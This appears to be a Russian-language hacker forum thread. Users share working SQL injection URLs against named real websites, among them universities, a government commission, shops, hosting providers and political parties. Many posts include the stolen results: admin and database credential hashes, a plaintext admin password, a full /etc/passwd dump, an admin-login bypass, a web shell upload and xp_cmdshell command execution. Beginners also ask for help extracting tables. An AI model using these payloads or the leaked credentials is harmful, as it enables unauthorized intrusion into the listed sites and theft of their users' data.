rabota-smolensk.info
rabota-spb.info
rabota-stavropol.info
rabota-tambov.info
rabota-tomsk.info
rabota-tula.info
rabota-tver.info
rabota-tyumen.info
rabota-ufa.info
rabota-ulyanovsk.info
rabota-volgograd.info
rabota-voronezh.info
rabota-yaroslavl.info
rabota-yugra.info

http://www.geenivaramu.ee/index.php?sub=-15%20union%20select%201,2,AES_DECRYPT(AES_ENCRYPT( concat(name,0x3a,pass),1),1),4,5%20from%20users%20 limit%201,1/*

там basic авторизация, первый пароль не подошел

Сайт: www.doorsopendays.com

inj: 1'+or+1=

Версия: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

Имя БД: doorsopendays

http://www.doorsopendays.com/communities.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NAM E+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+ NOT+IN+('comd_list','Buildings','Communities','dtp roperties','Maps','sysconstraints','syssegments',' cmd','D99_CMD','D99_REG','D99_Tmp','kill_kk'))--

www.wanna-be.tv
9 юзеров

http://www.wanna-be.tv/items.php?item=99999999+union+select+1,id,3,userna me,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,passwo rd,38+from+users+limit+0,1/*

www.active-video.net
http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat_ws(0x3a,user(),vers ion(),database()),4,5,6,7,8,9,10,11,12/*
sitemaster@localhost:5.0.22:zerinru_cms

http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat(table_schema,char(5 8),table_name),4,5,6,7,8,9,10,11,12+from+informati on_schema.columns+where+column_name=0x6c6f67696e+l imit+0,1/*
вытаскиваем таблицу с юзерами:zerinru_cms:users_mk

http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat(table_schema,char(5 8),COLUMN_NAME),4,5,6,7,8,9,10,11,12+from+informat ion_schema.columns+where+table_name='users_mk'+lim it+0,1/* узнаем имена колонок:ID,Login,Password,Email,Status

http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat_ws(0x3a,login,passw ord,ID,Email),4,5,6,7,8,9,10,11,12+from+users_mk/*
=))
admin:8dc6eab8d5b075c7523797412cba4564:1:asd@asd.a sd
news:bd27bd83e6598a329eaee5c62a876726:2:asd@asd.as d
user:e7c3218ac64594c02bc5c793f5c6b99a:3:none

http://www.leform.ru/design.php?id=430%20union%20select%201,name,id,4,5 ,6,7,8,9%20from%20designer/*

джэс тур
http://www.bali-welcome.ru/hotel6.php?id=430%20union%20select%201,2,3,4,5,con cat(user(),char(58),database()),7/*

Уруру - http://www.webfile.ru/files.php?search=gemaglabin')+and+1=0+union+select +1,2,3,4,table_name,6,7,8,9,10,11,12,13,14+From+IN FORMATION_SCHEMA.TABLES+LIMIT+1,1/*

Гема ужасно набоянил =)
///
http://www.fondationbrigittebardot.fr/site/fondation.php?Id=-6+union+select+1,aes_decrypt(aes_encrypt(version() ,0x99),0x99),3,4,5,6

Вопрос от новичка:
тестирую www.ukazatel.ru/search.php
инъекцию допускает, но ничего путного извлечь не мог, результаты запроса не сразу выводятся, а идут дальше в другой запрос. Это что значит, что инъекция тут невозможнп?

Иркутский филиал СТК. 36 таблиц с паролями x_X

http://www.esir.ru/ru/contact/forum/s/p/?checkforums=1&checksubject=-1+union+select+1,2,3,4,5,concat_ws(0x203a20,user() ,version(),database()),count(concat_ws(0x203a20,ta ble_schema,table_name,column_name)),8,9,10,11,12,1 3,14,15+from+information_schema.columns+where+colu mn_name="passwd"+or+column_name="password"+or+column_name="pass"

Для красивого вывода можно было бы раскрутить _http://www.esir.ru/ru/contact/forum/s/?checkforums=-1+or+1=2 но чего-то не получилось =\

http://www.master-office.ru/index.php?l=2&pid=-1%20union%20select%201,2,concat(user(),0x3a,databa se(),0x3a,version()),4,5,6,7/*
Четверка. Вывести ничего не получилось :(

http://www.ciu.edu/seminary/faculty/contact.php?id=-1+union+select+1,2,3,concat(0x22202F3E3C62723E3C62 723E3C63656E7465723E3C623E,VERSION(),0x3a,DATABASE (),0x3a,USER(),0x3C2F623E3C2F63656E7465723E3C212D2 D)
Во как :) Четвёртая, перебирать лень :o

http://apps.sais-jhu.edu/faculty_bios/faculty_bio1.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x5B3A5 D,user,password),11,12,13,14,15,16,17,18,19,20,21, 22,23,24+from+mysql.user
Хы... Первый раз вижу что бы всё было так запущено =\

sibrabota.ru - Работа в Красноярске и Сибири
http://sibrabota.ru/bank.php?target=resume&id_r=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
version: 4.1.22-standard
user: sibrabota@localhost
database: sibrabota

Не везет мне на четверки. :( Подбор таблиц закончился неудачно. Может быть у вас что выйдет.

Хенк
http://www.albatros-travel.dk/main.asp?product_id=1'+or+1=(@@version+);exec+mast er..xp_cmdshell+[dir+C:\]--

угу мы такие хекеры...

http://www.unpan.org/autoretrieve/regional_focus.asp?region=europe&focus=1'%20or%201%3D%28select%20%27records%3A%27%2 bcast%28count%28*%29%20as%20nvarchar%29%20from%20s tellent..Users%20%20%20%29--

Плак Плак (((=

www.maineservicecommission.gov

http://www.maineservicecommission.gov/MVF/article.php?ID=-1+union+select+1,2,user(),version(),database(),6,7 ,8,9,10,11,12,13/*

job.nenu.edu.cn

http://job.nenu.edu.cn/student/schshow.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12,13 ,14,15,16,17,user,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36+from+mysql.user/*

root:69aa6ce56e31ae92

http://panicprice.com.ua/?event=search_like_product&id=-168682+union+select+concat_ws(0x203a20,table_schem a,table_name)+from+information_schema.tables--&cId=-675

http://www.estcoenterprises.com/display_lines.php?cat_id=-9999+union+select+1,2,password+from+users/*

Толи я чего, толи нету таблицы login(и её подобные) есть тока passw... И пасс подходит как логин\пасс
http://www.estcoenterprises.com/admin/

http://www.mvservice.ru/price.php?do=5&open=380&popen=-1712+union+select+1,concat(version(),0x3a,user(),0 x3a,database()),3--&PHPSESSID=bf6f6d643c1f4e053c50090464152c87

Четвертая версия, вывод в заголовке страницы

http://www.devmaster.net/ - сайт программеров... =(

http://www.devmaster.net/articles.php?catID=-6+union+select+1,convert(concat(user(),0x3a,databa se(),0x3a,version())+using+latin1)/*


}{.3. 4e:
http://www.sev.com.au/news.php?articleid=-3608+union+select+1,concat(version(),0x3a,database (),0x3a,user()),3,4,5,6,7,8,9,10,11,12


Human Rights Resource Center:
http://www.hrusa.org/field/listings.php?catid=-2+union+select+concat(version(),0x3a,database(),0x 3a,user(),0x3a,name,0x3a,password),2,3,4+from+user s/*
admin:59395e208ea9aa41f94f1cfabe62dcad

iPod? =)))))))
http://www.ipoding.com/index.php?catid=-11+union+select+1,2,3,4,5,6,7,concat(version(),0x3 a,database(),0x3a,user()),9,10,11,12,13,14,15,16,1 7,18,19,20,21/*

http://megaload.megalan.tv/catalog.php?id=-1+union+select+1,concat_ws(0x3a,login,psw)+from+me gaload_auth+limit+0,1/*
http://dj.chem.msu.ru/person.php?id=-165+union+select+1,2,3,concat_ws(0x3a,login,passwo rd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39+from+users/*

http://www.hairstudio.ro/sex.php?id=-5+union+select+1,count(table_name),user(),4+from+i nformation_schema.tables/*
user=\

Duke News =\
http://www.dukemednews.duke.edu/news/article.php?id=-9583+UNION+SELECT+user(),2,version(),4,database(), concat(user,0x3a,password),7,8+from+mysql.user/*
root:623460e26f081bbc
web:761b2fc844890384
mnogosearch:0547d8b07eba42f3 =\

=\\


http://hostingwolf.com/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E,email,0x3a,password),6,7,8 ,9,10,0x223E3C212D2D,12,13/**/from/**/links/*



email+password

David Levine's Economic and Game Theory Page =\

http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13/*
http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9, 10,concat(user(),0x3a,version(),0x3a,database()),1 2,13/*
http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9, 10,concat(user,0x3a,password),12,13+from+mysql.use r/*
http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9, 10,table_name,12,13+from+INFORMATION_SCHEMA.tables/*


root:7cf9857402f566aa
design:7cf9857402f566aa
replicate:7cf9857402f566aa
access:55d97f31500ff4ea
levucla:6de799125318a5b4
xjfllehhq208951:57efde0a663a5956
xfjklmghq188885:0bb7efbf598cc88a
xbiffikhq542373:72d927ea51170e2b
xgbffgkhq522308:3d012a8c0201b3b8

http://www.eyeforpharma.com/index.asp?ch2=174+and+1=(select+top+1+table_name+f rom+information_schema.tables+where+table_name+not +in+('SubscriberContent_XREF','SUBSCRIBERS','SUBSC RIBERS_XREF','vwTravel_Contact','SubscribersBusine ss_XREF','surround','SurveyAnswers','AeroUpload',' AllArticles_DisplayTime_View','AREAS','AREAS_CHANN ELS_XREF','AREASCHANNELSVIEW','Author_Profile','AU THORS','authors_xref','AutoPrintSubs','AutoRespons e','board','CATEGORY','CATEGORY_SUBCATEGORY_XREF', 'Channel_Article_View','CHANNEL_XREF','CHANNEL1_2_ MENULINK','CHANNEL2_XREF','CHANNEL3_XREF','CHANNEL S','CHANNELS2','CHANNELS3','COMMENTS','COMPANY','C ounters','DailyNewsPopup','delegate_details','dele gates','dir_temp','DIRECTORY','DIRECTORY_CATEGORY_ XREF','DIRECTORY_old','DIRECTORY_SHAREPRICE_XREF', 'DIRECTORY_SUBCATEGORY_XREF','directoryxls','discu ssion_delegates','DNES3_Config','DNES3_Mode3','DNE Server_Config','dtproperties','Ebusiness','EMailAr ticleUsers','ENERGYEVENTS','EVENT','EVENTS','EXHIB ITING','Expo','featuredContent','FeaturedContent2' ,'feedback','FifteenWords','FrontPage_LocationMatr ix','FrontPage_Services','Gerry_temp','ICDirectory XPort','ICExportView','INDUSTRY','JOBS','JOBSBOARD ','JOBSCOMPANIES','MarketsExchanges_NewsFeedOut_Vi ew','MCONNECT','messages','MforMobileNewsletter_Ch annelExtract','news','Newsletter','Newsletter_Clip s_Comment_View','Newsletter_ClipsComments','Newsle tter_ClipsComments_Channel','Newsletter_ClipsComme nts_XREF','Newsletter_MeetPress','Newsletter_MeetP ress_View','Newsletter_Reports_View','Newsletter_R eports_XREF','Newsletter_Responder','NewsletterArc hiveFiles','OnlineMagazines','OPENING','PANEL','PA NELSPEAKERS','PASSWORD','PERSON','PRESENTATION','p resentations','PRESENTER','PublishedNewsletters_Re ports_View','RECRUITMEN','RECRUITMENT','REGISTER', 'relatedstories','REPORT','REPORT_AREAS_XREF','Rep ort_Content_View','REPORT_DISPLAY','REPORT_POLL_XR EF','REPORT_SUBCHANNEL_XREF','REPORT_TRANSLATIONS_ XREF','ReportCompanies_XREF','ReportLinkedCompanie s','Reports_By_Author_View','Resource_Articles','R esults','RESUMES','SendToFriendAddresses','SHAREPR ICE','SHARES_DIRECTORY','SHARESTEMP','Sheet1$','Sh eet2$','Sheet3$','Sht','Siwebtmp','STATS','STATS_R EFERER','Stream','SUBCATEGORY','SUBCHANNEL_XREF',' SUBCHANNELS','SurveyQuestion','sysconstraints','sy ssegments','t_jiaozhu','tbl_IPCapture','tbl_Visito r','tblAerospaceMembers','tblAuto_Contact_Details' ,'tblAuto_Response_Category','tblAuto_Response_Con ference','tblAuto_Response_Conferences','tblAuto_R esponse_Counter','tblAuto_X_REF','tblDirCategories ','tblDirCompanies','tblDirCompanyCategoryXref','t blDirCompanyCustomerXref','tblDirCompanyPartnerXre f','tblDirWebsite','tblEmail_Wizard','tblMobile_De legates','tblPharma_Contact_Details','tblPharma_PP _Details','tblPharma_Response_Category','tblPharma _Response_Conferences','tblPharma_Response_Counter ','tblPharma_Subscriber','tblPharma_X_REF','tblTra nsport_Contact_Details','tblTransport_Response_Cat egory','tblTransport_Response_Counter','tblTranspo rt_X_REF','tblTravel_Contact','tblTravel_Contact_D etails','tblTravel_Contact_PostEvent','tblTravel_C ontact_PostEvent2005backup','tblTravel_Contact2005 backup','tblTravel_ContactMessage','tblTravel_Cont actMessage2005backup','tblTravel_Country','tblTrav el_Event','tblTravel_Response_Category','tblTravel _Response_Conferences','tblTravel_Response_Counter ','tblTravel_User','tblTravel_User_Event','tblTrav el_X_REF','Telematic','toplevel','toplevel','tpplo POLL_OPTIONS','tpplqPOLL_QUESTIONS','tpplrPOLL_RES ULTS','TRANSLATION','TRANSLATIONS','transport_xml_ feed_view','transportsubscribers','TRAVEL%20SEMINA R%20LIST','travel_delegates','travel_events','trav el_events_xref','travel_messages','TravelRHS','tvp 1CHANNEL','tvtp5CHANNEL','VENUE','view_AutoDailyPe rsonalised','VisitorLogins','Visitors','vw_DailyMa ilerSubscribers','WAP','WebsiteComment','xref_Subs criberVisitor','xx-DIRECTORY1','xx-DIRECTORY-2','xx-DIRECTORY-latest','xx-DIRECTORY-olddb'))--


Ebusiness (id, FirstName, LastName, Company, Position, Address1, Address2, State, Zip, Country, Telephone, Fax, Email, Occupation, Newsletter, WeeklyWrap, MoreInfo, MoreInfo2)

EMailArticleUsers

OnlineMagazines (id, Published, industry, IssueNo, Description, Link, Img, Counter)

PASSWORD (PERSONCODE, EVENTCODE, CHECKED)

http://edu.direktor.ru/lib/author.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/*
http://edu-net.khb.ru/index.php?page=news&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version (),database()),5,6,7,8/*

http://info.l2r.ru/?part=items&id=1+or+1=@@version--

может кто подсказать что дальше делать, чтобы получить доступ к бд сайта? что то не получается у меня:(

Princeton University Program for Law and Public Affairs

http://lapa.princeton.edu/peopledetail.php?ID=-507+UNION+SELECT+1,2,3,4,5,concat(version(),0x3a,u ser(),0x3a,database()),7,8,9,10,11,12,13,14,15,16, 17,16,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39/*

http://lapa.princeton.edu/peopledetail.php?ID=-507+UNION+SELECT+1,2,3,4,5,concat(user,0x3a,passwo rd),7,8,9,10,11,12,13,14,15,16,17,16,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+ from+mysql.user/*

root:*74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3

"/etc/passwd"

http://lapa.princeton.edu/peopledetail.php?ID=-507+UNION+SELECT+1,2,3,4,5,load_file(0x2F6574632F7 06173737764),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39/*


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/openpkg/lib/openpkg/bash
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mysql:x:27:351:MySQL Server:/var/lib/mysql:/bin/bash
openpkg:x:42000:42000:/openpkg OpenPKG (management):/openpkg:/openpkg/lib/openpkg/bash
openpkg-r:x:42001:42001:/openpkg OpenPKG (restricted):/openpkg:/openpkg/lib/openpkg/bash
openpkg-n:x:42002:42002:/openpkg OpenPKG (non-privileged):/openpkg:/openpkg/lib/openpkg/bash
csgweb:x:61400:36::/home/csgweb:/bin/bash
+agvols::0:0:::
+facphoto::0:0::/var/local/as/home/facphoto:
+puombuds::0:0:::
+crosley::0:0:::
+daveh::0:0:::
+fleming::0:0:::
+nmcstaff::0:0:::
+oitdas::0:0:::
+pucap::0:0:::
+serge::0:0:::
+stevea::0:0:::
+fausey::0:0:::
+albin::0:0::/var/local/as/home/albin:
+agvols::0:0::/var/local/as/home/agvols:
+officehr::0:0::/u/officehr:
+mdmuzzie::0:0::/u/mdmuzzie:
+acla06::0:0::/u/acla06:
+genpurch::0:0::/u/genpurch:
+uait::0:0::/var/local/as/home/uait:
+pia::0:0::/u/pia:
+tafsir::0:0::/u/tafsir:
+transreg::0:0::/u/transreg:
+afrstds::0:0::/u/afrstds:
+restudy::0:0::/u/restudy:
+odc::0:0::/u/odc:
+jkchu::0:0::/u/jkchu:
+newmedia::0:0::/u/newmedia:
+ims::0:0::/var/local/as/home/ims:
+eeweb::0:0::/var/local/as/home/eeweb:
+eewebs::0:0::/var/local/as/home/eewebs:
+philosph::0:0::/var/local/as

Httpd.conf
http://lapa.princeton.edu/peopledetail.php?ID=-507+UNION+SELECT+1,2,3,4,5,load_file(0x2F6574632F6 8747470642F636F6E662F68747470642E636F6E66),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39/*

http://www.lookit.biz/news.php?id=-1'+union+select+1,Version(),database(),4,5,6,user( )/*
ГЫГЫ типо сайт для ИТ спецов:)

ГЫГЫ типо сайт для ИТ спецов:)

вот так лучше..

http://www.lookit.biz/news.php?viewcount=300&viewtype=3&pt=-1+union+select+1,2,3,concat_ws(char(58),acc_login, convert(acc_pwd%20using%20cp1251),acc_email),5,6+f rom+account/*

Тока никак не могу подобрать кодировку пароля :(

Вот тут посмотрите
http://blogs.xnet.lv/index.php?zoomzina=2532+union+select+1,2,3/*

Вот тут посмотрите
http://blogs.xnet.lv/index.php?zoomzina=2532+union+select+1,2,3/*

http://blogs.xnet.lv/index.php?zoomzina=-2532+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(conc at(user(),0x3a,version(),0x3a,database()),1),1),4, 5,6,7,8,9,10,11,12,13,14,15,16/*

http://links.odessa.net/all_links.php3?s=1+UNION+SELECT+1,2,3,4,5,6,7,8,9, 10,11,12,13,14/*
1,4,7,12 видимые... они в самом низу.. помогите надыбать таблице и т.д. очень надо)

Grema
Получите, распишитесь.
http://links.odessa.net/all_links.php3?s=1+UNION+SELECT+1,2,3,pass,5,6,nam e,8,9,10,11,id,13,14%20from%20users/*

http://www.sexshop-romantic.ro/sex-shop/?id=69+union+select+1,2,3--

elpa.coe.missouri.edu

http://elpa.coe.missouri.edu/index.php?page=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat( user(),0x3a,version(),0x3a,database()),1),1),4,5,6 ,7,8,9,10,11/*

http://www.forsleep.ru/index.php?rn_id=-14+union+select+1,concat_ws(0x203a20,table_name,co lumn_name),3,4,5,6,7+from+information_schema.colum ns/*

http://www.helpsystem.ru/news/mir.jpg
Межгосударственная телерадиокомпания «Мир»

mysql 4, magic_quotes off, file_priv off.
http://www.mirtv.ru/show.php?id=14968+order+by+5&templ=news
http://www.mirtv.ru/show.php?id=-14968+union+select+1,version(),3,4,5&templ=news

и вообще сайт очень насыщен sql-инекциями :eek:

ps.
http://www.mirtv.ru/admin/
login: admin' or 1=1/*
pass: k8<3you

шелл залит, сюда не выкладывать и не дефейсить - будьте людьми. ваши варианты залития в пм :p

http://www.helpsystem.ru/news/mir.jpg
Межгосударственная телерадиокомпания «Мир»

mysql 4, magic_quotes off, file_priv off.
http://www.mirtv.ru/show.php?id=14968+order+by+5&templ=news
http://www.mirtv.ru/show.php?id=-14968+union+select+1,version(),3,4,5&templ=news

и вообще сайт очень насыщен sql-инекциями :eek:

ps.
http://www.mirtv.ru/admin/
login: admin' or 1=1/*
pass: k8<3you

шелл залит, сюда не выкладывать и не дефейсить - будьте людьми. ваши варианты залития в пм :p

Странно.. шелл залил, но листинг директорий запрещен... бага банальная.. но лови +2 :)

shop
http://www.chessbase.com/shop/product.asp?pid=1+or+1=(SELECT+TOP+1+TABLE_NAME+FR OM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+ IN+('nachrichten','acpplayers','bundesligaspieler' ,'cbuser','dailychess','dedownload','deevent','des upport','deutschmann_pw','deutschmann_shop','downl oad_e','dtproperties','elturco','esnews','events_e ','lapista','news','pictureup','products','product s_es','servernews_es','shopd','spotlight','support ','support_e','sysconstraints','syssegments','trai ning','turnierraum','usdollar','users'))--

http://www.chessbase.com/shop/product.asp?pid=1+or+1=(SELECT+TOP+1+COLUMN_NAME+F ROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='u sers'+AND+COLUMN_NAME+NOT+IN+('user_id','user_user name','user_password','user_email','user_street',' user_city','user_state','user_zip','user_ccnumber' ,'user_cctype','user_ccexpires','user_ccname'))--

http://www.chessbase.com/shop/product.asp?pid=1+or+1=(SELECT+TOP+1+cast(user_use rname+as+nvarchar)%2B%27%3A%27%2Bcast(user_passwor d+as+nvarchar)+from+users+where+user_id=1)--

http://www.greenparty.ua/?p=news_a&ln=3&cats=-1'+union+select+user()/*
ПАРТИЯ ЗЕЛЁНЫХ Украины
http://www.spu.in.ua/ua/search/?search_word=1'
Социалистическая партия Украины (ток чёт я ту не разобрался:()

Создание сайтов, веб дизайн, раскрутка сайтов, создание интернет-магазинов, создание мультимедийных презентаций, интранет-сайты, фирменный стиль, разработка логотипов, продвижение сайтов, поисковая оптимизация - OnArt
www.onart.ru
Хреново создают сайты, если у самих скулей полно ;)

http://www.onart.ru/index.php?page=54&id=-14+UNION+SELECT+1,2,3,concat(login,0x3a,password), 5,6,7,8,9+from+users+limit+0,1/*

admin:onart333

сайт какого-то хостера (divhost.ru)

http://divhost.ru/news.php?id=1+union+select+1,2,3,concat(user(),cha r(58),database(),char(58),version())/*

еще один хостер
www.ukrnic.com
http://www.ukrnic.com/hosting_info.php?id=-3+union+select+1,2,concat(user(),0x3a,version())/*

http://www.housing.wisc.edu/resnet/news/story.php?id=-1+union+select+1,2,3,4,5,load_file(char(47,101,116 ,99,47,112,97,115,115,119,100,45)),7,8,9,0/*

http://experts.uchicago.edu/experts.php?id=-1+union+select+1,2,3,4,load_file(char(47,101,116,9 9,47,112,97,115,115,119,100)),6,7,8,9,0,1,2,3,4,5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2/*

http://aei-brookings.org/events/page.php?id=-152+union+select+1,2,3/*

первая моя SQL-inj

http://peacekeeper.ru
user=\
http://peacekeeper.ru/index.php?mid=-1769+union+select+1,2,3,4,5,6,version(),8,user(),1 0,11,12,13/*
http://peacekeeper.ru/index.php?mid=-1769+union+select+1,2,3,4,5,6,column_name,8,9,10,1 1,12,13+from+Information_schema.columns+where+tabl e_name=0x6d69726f74766f7265635f6d61696e/*
http://peacekeeper.ru/index.php?mid=-1769+union+select+1,2,3,4,5,6,concat(id,char(58),n ame2),8,9,10,11,12,13+from+mirotvorec_main/*

www.nihoncar.com
Mysql Версия 5.

root:
http://www.nihoncar.com/en/news_details.php?id=-1+union+select+1,2,3,concat(user,0x3a,password),5, 6,7,8,9+from+mysql.user+limit+0,1/*

есть форум, пользователи:
http://www.nihoncar.com/en/news_details.php?id=-1+union+select+1,2,3,concat(username,0x3a,user_pas sword),5,6,7,8,9+from+phpbb_users+limit+1,1/*
лимит в помощь..

http://www.it-news.cc/index.php?type=article&ID=-1+union+select+MenuID+from+Article/*

ы

www.wfsj.org
Примечательно серв на Windows/IIS

http://www.wfsj.org/resources/page.php?id=-1+union+select+1,2,3,convert(concat(user(),0x3a,ve rsion()),binary),5,6,7,8,9,0,11/*

PR=6
inside.tufts.edu
http://inside.tufts.edu/announce/index.php?t=id&id=-471+union+select+1,2,aes_decrypt(aes_encrypt(conca t_ws(0x3a,version(),user()),0x3a),0x3a),4,5,6,7,8/*

есть табица users но не могу подобрать колонки

http://www.rzhavsky.com/politics.php?chr_id=-1+union+select+user(),database(),version(),4/*
какой-то Украинский политик...
http://www.reznik007.com/?p=-1'
MSSQL
http://www.snarodom.org.ua/index.php?level=1&type=topmenu&section=-5+union+select+1,user()/*
какая-то газетка:)
http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
интернет магазин
http://www.bookshop.ua/Asp/annot.asp?bid=654738'
книжный магазин но тут MSSQL а я в ней не шарю:(

какая-то газетка

http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*


Хех вот я немного раз... это самое... ладно вот:

http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(VERSI ON()),0x31),0x31),5,6,7,8,9,10,11/*

Ну вот версия 5.0.19-standard ну дальше смотрим имена таблиц и столбцов:

http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCA T_WS(0x2D,TABLE_NAME,COLUMN_NAME),0x31),0x31),5,6, 7,8,9,10,11 FROM INFORMATION_SCHEMA.COLUMNS/*

Ну вот собсно говоря таблица users:

http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCA T_WS(0x2D,id,login,pass),0x31),0x31),5,6,7,8,9,10, 11%20FROM%20users/*

Ну и наскока я понял это админы

http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCA T_WS(0x2D,id,login,pass),0x31),0x31),5,6,7,8,9,10, 11%20FROM users WHERE admin=1/*

Только где админка хрен его... :(

интернет магазин
Цитата:
http://www.bookshop.ua/Asp/annot.asp?bid=654738'

книжный магазин но тут MSSQL а я в ней не шарю

здесь insert, сделать по-моему ничего нельзя

Сайт:www.agricbank.com

http://www.agricbank.com/story.asp?ID=1+or+1=@@version--

http://www.spu.in.ua/ua/search/?search_word=1'

Социалистическая партия Украины (ток чёт я ту не разобрался)

Там два запроса... Прийдется подбирать по символу:
http://www.spu.in.ua/ua/search/?search_word=1') UNION SELECT 1 FROM pub WHERE id=IF(ASCII(SUBSTRING(VERSION(),1,1))>'50',1,(SELECT 1 UNION SELECT 2))/*
Кстати это 5 версия там 33 таблицы...
Для супер маньяков можно и поподбирать символы в названиях столбцов:
http://www.spu.in.ua/ua/search/?search_word=1') UNION SELECT 1 FROM pub WHERE id=IF(ASCII(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),1,1))>100,1,(SELECT 1 UNION SELECT 2))/*

http://ruskino.ru/news/?id=-393+union+select+VERSION(),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16/*

http://www.gaycentral.ru/news/?id=-1+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11/*
http://www.superwriter.net/index.php?current_subsection=-3+UNION+SELECT+1,2,3,4,5,6,7,VERSION(),9/*
http://partytown.ru/music.php?id=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,VERSION(),21/*
http://www.religion.no/bildebase/browse.php?action=overview&col=-9+UNION+SELECT+1,2,convert(concat(username,char(58 ),password)+using+latin1),4+FROM+arjan.users/*

Ну вот нашарил скулей мелкософта.


Сайт: www.russianlink.com

http://www.russianlink.com/article1.asp?text=articles&ID=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORM ATION_SCHEMA.TABLES+where+TABLE_NAME+NOT+IN+('tbl_ dating','tbl_gossip','tbl_cards','tbl_girls','D99_ Tmp','dtproperties','sysconstraints','syssegments' ,'tbl_album','tbl_articles'))-- //лень перебирать все таблицы.

Сайт: www.bcs.ru

http://www3.bcs.ru/webclients/chips/showonenew.asp?id=1%20or%201=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES)--

Сайт: www.appartment.ru

